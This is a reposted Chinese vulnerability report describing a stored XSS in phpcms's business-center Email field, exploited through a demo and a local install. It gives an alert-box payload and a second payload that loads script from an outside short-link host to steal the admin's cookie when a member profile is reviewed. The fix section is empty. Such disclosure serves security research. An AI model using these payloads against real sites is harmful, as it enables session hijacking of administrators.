码迷,mamicode.com
首页 > Web开发 > 详细

phpcms某处储存型XSS(demo+本地演示)

时间:2016-01-24 10:19:57      阅读:308      评论:0      收藏:0      [点我收藏+]

标签:

详细说明:

demo+本地演示



存在XSS的地方在商务中心的商家资料的我的资料的Email那里(这句话好绕口。。),属于过滤不严格随便插字符的问题,我直接在Email那里写上"/><svg onload=alert(/1/)>可以看到是正确的

技术分享



然后点击提交可以看到说操作成功

技术分享



然后来到我们的企业首页查看可以看到成功弹窗

技术分享

? ?

技术分享



再查看下源代码,可以看到是储存型的

技术分享



本来想去后台查看的,但是无奈demo不提供后台演示,只好本地搭建看看了,本地搭建好了以后来到后台查看是不能直接打后台的,但是管理员审核会员的时候会到会员的企业查看,这个时候可以看到成功弹窗

技术分享

? ?

技术分享



然后继续构造:"/><script src=http://t.cn/Rz4Oi2b></script>,提交后看看能不能打cookie

技术分享



可以看到已经成功打到cookie~

技术分享

漏洞证明:

技术分享

修复方案:

phpcms某处储存型XSS(demo+本地演示)

标签:

原文地址:http://www.cnblogs.com/h4ck0ne/p/5154545.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!